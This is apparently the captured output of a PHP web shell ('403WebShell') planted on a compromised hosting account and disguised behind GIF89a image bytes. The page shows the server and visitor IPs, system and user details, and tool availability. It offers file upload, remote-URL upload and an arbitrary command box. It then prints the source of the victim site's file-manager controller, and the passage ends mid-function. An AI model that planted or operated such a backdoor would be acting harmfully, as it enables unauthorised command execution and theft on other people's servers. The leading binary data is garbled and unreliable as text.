GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>172.67.177.218</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.195</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/home">home</a>/<a href="?loknya=/home/akhalid">akhalid</a>/<a href="?loknya=/home/akhalid/omerys">omerys</a>/<a href="?loknya=/home/akhalid/omerys/public_html">public_html</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin">admin</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin/controller">controller</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin/controller/common">common</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /home/akhalid/omerys/public_html/admin/controller/common/filemanager.php</tr></td></table><br/><pre>&lt;?php
class ControllerCommonFileManager extends Controller {
	public function index() {
		$this-&gt;load-&gt;language(&#039;common/filemanager&#039;);

		// Find which protocol to use to pass the full image link back
		if ($this-&gt;request-&gt;server[&#039;HTTPS&#039;]) {
			$server = HTTPS_CATALOG;
		} else {
			$server = HTTP_CATALOG;
		}

		if (isset($this-&gt;request-&gt;get[&#039;filter_name&#039;])) {
			$filter_name = rtrim(str_replace(array(&#039;*&#039;, &#039;/&#039;, &#039;\\&#039;), &#039;&#039;, $this-&gt;request-&gt;get[&#039;filter_name&#039;]), &#039;/&#039;);
		} else {
			$filter_name = &#039;&#039;;
		}

		// Make sure we have the correct directory
		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$directory = rtrim(DIR_IMAGE . &#039;catalog/&#039; . str_replace(&#039;*&#039;, &#039;&#039;, $this-&gt;request-&gt;get[&#039;directory&#039;]), &#039;/&#039;);
		} else {
			$directory = DIR_IMAGE . &#039;catalog&#039;;
		}

		if (isset($this-&gt;request-&gt;get[&#039;page&#039;])) {
			$page = $this-&gt;request-&gt;get[&#039;page&#039;];
		} else {
			$page = 1;
		}

		$directories = array();
		$files = array();

		$data[&#039;images&#039;] = array();

		$this-&gt;load-&gt;model(&#039;tool/image&#039;);

		if (substr(str_replace(&#039;\\&#039;, &#039;/&#039;, realpath($directory) . &#039;/&#039; . $filter_name), 0, strlen(DIR_IMAGE . &#039;catalog&#039;)) == str_replace(&#039;\\&#039;, &#039;/&#039;, DIR_IMAGE . &#039;catalog&#039;)) {
			// Get directories
			$directories = glob($directory . &#039;/&#039; . $filter_name . &#039;*&#039;, GLOB_ONLYDIR);

			if (!$directories) {
				$directories = array();
			}

			// Get files
			$files = glob($directory . &#039;/&#039; . $filter_name . &#039;*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF}&#039;, GLOB_BRACE);

			if (!$files) {
				$files = array();
			}
		}

		// Merge directories and files
		$images = array_merge($directories, $files);

		// Get total number of files and directories
		$image_total = count($images);

		// Split the array based on current page number and max number of items per page of 10
		$images = array_splice($images, ($page - 1) * 16, 16);

		foreach ($images as $image) {
			$name = str_split(basename($image), 14);

			if (is_dir($image)) {
				$url = &#039;&#039;;

				if (isset($this-&gt;request-&gt;get[&#039;target&#039;])) {
					$url .= &#039;&amp;target=&#039; . $this-&gt;request-&gt;get[&#039;target&#039;];
				}

				if (isset($this-&gt;request-&gt;get[&#039;thumb&#039;])) {
					$url .= &#039;&amp;thumb=&#039; . $this-&gt;request-&gt;get[&#039;thumb&#039;];
				}

				$data[&#039;images&#039;][] = array(
					&#039;thumb&#039; =&gt; &#039;&#039;,
					&#039;name&#039;  =&gt; implode(&#039; &#039;, $name),
					&#039;type&#039;  =&gt; &#039;directory&#039;,
					&#039;path&#039;  =&gt; utf8_substr($image, utf8_strlen(DIR_IMAGE)),
					&#039;href&#039;  =&gt; $this-&gt;url-&gt;link(&#039;common/filemanager&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;directory=&#039; . urlencode(utf8_substr($image, utf8_strlen(DIR_IMAGE . &#039;catalog/&#039;))) . $url, true)
				);
			} elseif (is_file($image)) {
				$data[&#039;images&#039;][] = array(
					&#039;thumb&#039; =&gt; $this-&gt;model_tool_image-&gt;resize(utf8_substr($image, utf8_strlen(DIR_IMAGE)), 100, 100),
					&#039;name&#039;  =&gt; implode(&#039; &#039;, $name),
					&#039;type&#039;  =&gt; &#039;image&#039;,
					&#039;path&#039;  =&gt; utf8_substr($image, utf8_strlen(DIR_IMAGE)),
					&#039;href&#039;  =&gt; $server . &#039;image/&#039; . utf8_substr($image, utf8_strlen(DIR_IMAGE))
				);
			}
		}

		$data[&#039;user_token&#039;] = $this-&gt;session-&gt;data[&#039;user_token&#039;];

		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$data[&#039;directory&#039;] = urlencode($this-&gt;request-&gt;get[&#039;directory&#039;]);
		} else {
			$data[&#039;directory&#039;] = &#039;&#039;;
		}

		if (isset($this-&gt;request-&gt;get[&#039;filter_name&#039;])) {
			$data[&#039;filter_name&#039;] = $this-&gt;request-&gt;get[&#039;filter_name&#039;];
		} else {
			$data[&#039;filter_name&#039;] = &#039;&#039;;
		}

		// Return the target ID for the file manager to set the value
		if (isset($this-&gt;request-&gt;get[&#039;target&#039;])) {
			$data[&#039;target&#039;] = $this-&gt;request-&gt;get[&#039;target&#039;];
		} else {
			$data[&#039;target&#039;] = &#039;&#039;;
		}

		// Return the thumbnail for the file manager to show a thumbnail
		if (isset($this-&gt;request-&gt;get[&#039;thumb&#039;])) {
			$data[&#039;thumb&#039;] = $this-&gt;request-&gt;get[&#039;thumb&#039;];
		} else {
			$data[&#039;thumb&#039;] = &#039;&#039;;
		}

		// Parent
		$url = &#039;&#039;;

		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$pos = strrpos($this-&gt;request-&gt;get[&#039;directory&#039;], &#039;/&#039;);

			if ($pos) {
				$url .= &#039;&amp;directory=&#039; . urlencode(substr($this-&gt;request-&gt;get[&#039;directory&#039;], 0, $pos));
			}
		}

		if (isset($this-&gt;request-&gt;get[&#039;target&#039;])) {
			$url .= &#039;&amp;target=&#039; . $this-&gt;request-&gt;get[&#039;target&#039;];
		}

		if (isset($this-&gt;request-&gt;get[&#039;thumb&#039;])) {
			$url .= &#039;&amp;thumb=&#039; . $this-&gt;request-&gt;get[&#039;thumb&#039;];
		}

		$data[&#039;parent&#039;] = $this-&gt;url-&gt;link(&#039;common/filemanager&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . $url, true);

		// Refresh
		$url = &#039;&#039;;

		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$url .= &#039;&amp;directory=&#039; . urlencode($this-&gt;request-&gt;get[&#039;directory&#039;]);
		}

		if (isset($this-&gt;request-&gt;get[&#039;target&#039;])) {
			$url .= &#039;&amp;target=&#039; . $this-&gt;request-&gt;get[&#039;target&#039;];
		}

		if (isset($this-&gt;request-&gt;get[&#039;thumb&#039;])) {
			$url .= &#039;&amp;thumb=&#039; . $this-&gt;request-&gt;get[&#039;thumb&#039;];
		}

		$data[&#039;refresh&#039;] = $this-&gt;url-&gt;link(&#039;common/filemanager&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . $url, true);

		$url = &#039;&#039;;

		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$url .= &#039;&amp;directory=&#039; . urlencode(html_entity_decode($this-&gt;request-&gt;get[&#039;directory&#039;], ENT_QUOTES, &#039;UTF-8&#039;));
		}

		if (isset($this-&gt;request-&gt;get[&#039;filter_name&#039;])) {
			$url .= &#039;&amp;filter_name=&#039; . urlencode(html_entity_decode($this-&gt;request-&gt;get[&#039;filter_name&#039;], ENT_QUOTES, &#039;UTF-8&#039;));
		}

		if (isset($this-&gt;request-&gt;get[&#039;target&#039;])) {
			$url .= &#039;&amp;target=&#039; . $this-&gt;request-&gt;get[&#039;target&#039;];
		}

		if (isset($this-&gt;request-&gt;get[&#039;thumb&#039;])) {
			$url .= &#039;&amp;thumb=&#039; . $this-&gt;request-&gt;get[&#039;thumb&#039;];
		}

		$pagination = new Pagination();
		$pagination-&gt;total = $image_total;
		$pagination-&gt;page = $page;
		$pagination-&gt;limit = 16;
		$pagination-&gt;url = $this-&gt;url-&gt;link(&#039;common/filemanager&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . $url . &#039;&amp;page={page}&#039;, true);

		$data[&#039;pagination&#039;] = $pagination-&gt;render();

		$this-&gt;response-&gt;setOutput($this-&gt;load-&gt;view(&#039;common/filemanager&#039;, $data));
	}

	public function upload() {
		$this-&gt;load-&gt;language(&#039;common/filemanager&#039;);

		$json = array();

		// Check user has permission
		if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;common/filemanager&#039;)) {
			$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_permission&#039;);
		}

		// Make sure we have the correct directory
		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$directory = rtrim(DIR_IMAGE . &#039;catalog/&#039; . $this-&gt;request-&gt;get[&#039;directory&#039;], &#039;/&#039;);
		} else {
			$directory = DIR_IMAGE . &#039;catalog&#039;;
		}

		// Check its a directory
		if (!is_dir($directory) || substr(str_replace(&#039;\\&#039;, &#039;/&#039;, realpath($directory)), 0, strlen(DIR_IMAGE . &#039;catalog&#039;)) != str_replace(&#039;\\&#039;, &#039;/&#039;, DIR_IMAGE . &#039;catalog&#039;)) {
			$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_directory&#039;);
		}

		if (!$json) {
			// Check if multiple files are uploaded or just one
			$files = array();

			if (!empty($this-&gt;request-&gt;files[&#039;file&#039;][&#039;name&#039;]) &amp;&amp; is_array($this-&gt;request-&gt;files[&#039;file&#039;][&#039;name&#039;])) {
				foreach (array_keys($this-&gt;request-&gt;files[&#039;file&#039;][&#039;name&#039;]) as $key) {
					$files[] = array(
						&#039;name&#039;     =&gt; $this-&gt;request-&gt;files[&#039;file&#039;][&#039;name&#039;][$key],
						&#039;type&#039;     =&gt; $this-&gt;request-&gt;files[&#039;file&#039;][&#039;type&#039;][$key],
						&#039;tmp_name&#039; =&gt; $this-&gt;request-&gt;files[&#039;file&#039;][&#039;tmp_name&#039;][$key],
						&#039;error&#039;    =&gt; $this-&gt;request-&gt;files[&#039;file&#039;][&#039;error&#039;][$key],
						&#039;size&#039;     =&gt; $this-&gt;request-&gt;files[&#039;file&#039;][&#039;size&#039;][$key]
					);
				}
			}

			foreach ($files as $file) {
				if (is_file($file[&#039;tmp_name&#039;])) {
					// Sanitize the filename
					$filename = basename(html_entity_decode($file[&#039;name&#039;], ENT_QUOTES, &#039;UTF-8&#039;));

					// Validate the filename length
					if ((utf8_strlen($filename) &lt; 3) || (utf8_strlen($filename) &gt; 255)) {
						$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_filename&#039;);
					}

					// Allowed file extension types
					$allowed = array(
						&#039;jpg&#039;,
						&#039;jpeg&#039;,
						&#039;gif&#039;,
						&#039;png&#039;
					);

					if (!in_array(utf8_strtolower(utf8_substr(strrchr($filename, &#039;.&#039;), 1)), $allowed)) {
						$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_filetype&#039;);
					}

					// Allowed file mime types
					$allowed = array(
						&#039;image/jpeg&#039;,
						&#039;image/pjpeg&#039;,
						&#039;image/png&#039;,
						&#039;image/x-png&#039;,
						&#039;image/gif&#039;
					);

					if (!in_array($file[&#039;type&#039;], $allowed)) {
						$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_filetype&#039;);
					}

					// Return any upload error
					if ($file[&#039;error&#039;] != UPLOAD_ERR_OK) {
						$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_upload_&#039; . $file[&#039;error&#039;]);
					}
				} else {
					$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_upload&#039;);
				}

				if (!$json) {
					move_uploaded_file($file[&#039;tmp_name&#039;], $directory . &#039;/&#039; . $filename);
				}
			}
		}

		if (!$json) {
			$json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_uploaded&#039;);
		}

		$this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
		$this-&gt;response-&gt;setOutput(json_encode($json));
	}

	public function folder() {
		$this-&gt;load-&gt;language(&#039;common/filemanager&#039;);

		$json = array();

		// Check user has permission
		if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;common/filemanager&#039;)) {
			$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_permission&#039;);
		}

		// Make sure we have the correct directory
		if (isset($this-&gt;request-&gt;get[&#039;directory&#039;])) {
			$directory = rtrim(DIR_IMAGE . &#039;catalog/&#039; . $this-&gt;request-&gt;get[&#039;directory&#039;], &#039;/&#039;);
		} else {
			$directory = DIR_IMAGE . &#039;catalog&#039;;
		}

		// Check its a directory
		if (!is_dir($directory) || substr(str_replace(&#039;\\&#039;, &#039;/&#039;, realpath($directory)), 0, strlen(DIR_IMAGE . &#039;catalog&#039;)) != str_replace(&#039;\\&#039;, &#039;/&#039;, DIR_IMAGE . &#039;catalog&#039;)) {
			$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_directory&#039;);
		}

		if ($this-&gt;request-&gt;server[&#039;REQUEST_METHOD&#039;] == &#039;POST&#039;) {
			// Sanitize the folder name
			$folder = basename(html_entity_decode($this-&gt;request-&gt;post[&#039;folder&#039;], ENT_QUOTES, &#039;UTF-8&#039;));

			// Validate the filename length
			if ((utf8_strlen($folder) &lt; 3) || (utf8_strlen($folder) &gt; 128)) {
				$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_folder&#039;);
			}

			// Check if directory already exists or not
			if (is_dir($directory . &#039;/&#039; . $folder)) {
				$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_exists&#039;);
			}
		}

		if (!isset($json[&#039;error&#039;])) {
			mkdir($directory . &#039;/&#039; . $folder, 0777);
			chmod($directory . &#039;/&#039; . $folder, 0777);

			@touch($directory . &#039;/&#039; . $folder . &#039;/&#039; . &#039;index.html&#039;);

			$json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_directory&#039;);
		}

		$this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
		$this-&gt;response-&gt;setOutput(json_encode($json));
	}

	public function delete() {
		$this-&gt;load-&gt;language(&#039;common/filemanager&#039;);

		$json = array();

		// Check user has permission
		if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;common/filemanager&#039;)) {
			$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_permission&#039;);
		}

		if (isset($this-&gt;request-&gt;post[&#039;path&#039;])) {
			$paths = $this-&gt;request-&gt;post[&#039;path&#039;];
		} else {
			$paths = array();
		}

		// Loop through each path to run validations
		foreach ($paths as $path) {
			// Check path exsists
